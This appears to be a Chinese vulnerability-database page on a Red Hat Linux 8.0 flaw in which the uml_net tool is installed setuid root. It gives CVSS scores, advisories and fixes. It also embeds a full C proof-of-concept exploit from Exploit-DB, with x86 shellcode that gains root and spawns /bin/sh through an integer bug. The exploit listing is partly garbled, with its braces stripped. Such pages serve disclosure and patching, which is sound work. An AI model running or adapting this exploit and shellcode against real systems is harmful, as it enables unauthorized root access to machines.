发布时间 :2003-02-19 00:00:00
修订时间 :2008-09-10 20:05:23

[原文]uml_net in the kernel-utils package for Red Hat Linux 8.0 has incorrect setuid root privileges, which allows local users to modify network interfaces, e.g. by modifying ARP entries or placing interfaces into promiscuous mode.

[CNNVD]RedHat Linux User Mode Linux SetUID安装漏洞(CNNVD-200302-045)

        RedHat是一款免费开放源代码的Linux操作系统,其中kernel-util包包含多个工具用来控制内核或者机器硬件,Redhat 8.0包含User Mode Linux(UML)工具。
        RedHat8.0默认包含的kernel-utils包中的uml_net工具不正确地以setuid root属性安装,可允许本地用户利用此工具控制部分网络接口,增加和删除ARP条目和路由,并可以把接口置于混杂模式。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  XF  linux-umlnet-gain-privileges(11276)
(UNKNOWN)  BID  6801

- 漏洞信息

RedHat Linux User Mode Linux SetUID安装漏洞
高危 配置错误
2003-02-19 00:00:00 2005-05-13 00:00:00
        RedHat是一款免费开放源代码的Linux操作系统,其中kernel-util包包含多个工具用来控制内核或者机器硬件,Redhat 8.0包含User Mode Linux(UML)工具。
        RedHat8.0默认包含的kernel-utils包中的uml_net工具不正确地以setuid root属性安装,可允许本地用户利用此工具控制部分网络接口,增加和删除ARP条目和路由,并可以把接口置于混杂模式。

- 公告与补丁

        * chmod -s /usr/bin/uml_net
        RHSA-2003:056-08:Updated kernel-utils packages fix setuid vulnerability
        Red Hat Linux 8.0:
        rpm -Fvh [文件名]

- 漏洞信息 (22640)

UML_NET Integer Mismanagement Code Execution Vulnerability (EDBID:22640)
linux local
2003-05-23 Verified
N/A [点击下载]

A vulnerability has been discovered in uml_net. Due to integer mismanagement while handling version information, it may be possible for an attacker to execute arbitrary code. Specifically, by supplying a negative value within the version information it is possible to bypass various calculations and cause an invalid indexing into an array of functions. As a result, it is possible for an attacker to execute a function in an attacker-controlled location of memory.

Successful exploitation of this vulnerability would allow an attacker to execute arbitrary commands with the privileges of uml_net, possibly root. 

  uml_net proof of concept exploit 
  Tested on: RH 8.0 with default uml_utilities from kernel-utils-2.4-8.13 
             RH 8.0 with binary from uml_utilities_20030312, uml_utilities_20020821
  It may work on other linux distributions 
  Based on the bug that I found in uml_net.c on 23.05.2003
  Greets: M|G - no1 keep up the good work
  	  securitech guys, security-corp guys - thx for the challenges
  	  all of you who support me in real life 

#include <stdio.h>

#define SHELL 0xbffffdd7
#define ROT -302068188

char *
gen (int pad)
  int i, size;
  char *p;
  char shellcode[] = "\x31\xc0"	// xorl    %eax,%eax
    "\x31\xdb"			// xorl    %ebx,%ebx
    "\xb0\x17"			// movb    $0x17,%al
    "\xcd\x80"			// int     $0x80
    "\xeb\x18"			// jmp     end
    				// start:
    "\x5e"			// popl    %esi
    "\x89\x76\x08"		// movl    %esi,0x8(%esi)
    "\x31\xc0"			// xorl    %eax,%eax
    "\x88\x46\x07"		// movb    %eax,0x7(%esi)
    "\x89\x46\x0c"		// movl    %eax,0xc(%esi)
    "\xb0\x0b"			// movb    $0xb,%al
    "\x89\xf3"			// movl    %esi,%ebx
    "\x8d\x4e\x08"		// leal    0x8(%esi),%ecx
    "\x8d\x56\x0c"		// leal    0xc(%esi),%edx
    "\xcd\x80"			// int     $0x80
    				// end:
    "\xe8\xe3\xff\xff\xff"	// call    start
    "\x2f\x62\x69\x6e\x2f\x73\x68";	// .string "/bin/sh"

  size = sizeof (shellcode);
  p = (char *) malloc (5000 + size + 1);
  memset (p, 0x90, 5000);
  for (i = 1; i < 1000; i++)
    *(int *) (p + 4 * i + pad) = SHELL;
  memcpy (p + 5000, shellcode, size + 1);
  *p = "SM00NY=";
  return p;

usage (char *sir)
  printf ("\nUsage: %s <UML_NET> [pad]\n\n", sir);
  printf ("Pad value: 0 - 3\nDefault: 0\n");
  printf ("\n");
main (int argc, char **argv)
  unsigned long pad = 0;
  int loop;
  char s[1000];
  char *nume[4], *pume[2];

  if (argc < 2)
      usage (argv[0]);
      exit (0);

  if (argv[2])
    pad = atoi (argv[2]);

  sprintf (s, "%d", ROT);

  nume[0] = argv[1];
  nume[1] = s;
  nume[2] = "add";
  nume[3] = NULL;

  pume[0] = gen (pad);
  pume[1] = NULL;

  printf ("Trying to exploit.... pad value: %d\n", pad);
  printf ("If you get a segfault, try to change the pad value !\n");

  execve (nume[0], nume, pume);

- 漏洞信息

Red Hat Linux kernel_utils uml_net Overflow
Local Access Required Input Manipulation, Misconfiguration
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A local overflow exists in uml_net from kernel-utils. The uml_net fails to properly check bounds resulting in an integer overflow. With a specially crafted request, an attacker can cause an overflow resulting in a loss of confidentiality, integrity, and/or availability. Note that this would not normally be an issue, but this version of kernel-utils installs umn_net as setuid root.

- 时间线

2003-05-23 Unknow
2003-09-28 Unknow

- 解决方案

Upgrade to kernel-utils version 2.4-8.28 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): chmod -s /usr/bin/uml_net

- 相关参考

- 漏洞作者

- 漏洞信息

Red Hat Linux User Mode Linux SetUID Installation Vulnerability
Configuration Error 6801
No Yes
2003-02-07 12:00:00 2009-07-11 08:06:00
Discovery credited to Johnny Robertson.

- 受影响的程序版本

RedHat Linux 8.0 i386

- 漏洞讨论

It has been reported that under some circumstances, Red Hat Linux may allow unauthorized actions through User-Mode-Linux compatibility. Due to permissions on some components installed with the User-Mode-Linux utilities, a local user could perform actions on the system that require privilege, potentially affecting local host security.

- 漏洞利用

No exploit is required for this vulnerability.

- 解决方案

Fixes that correct this issue have been released:

RedHat Linux 8.0 i386

- 相关参考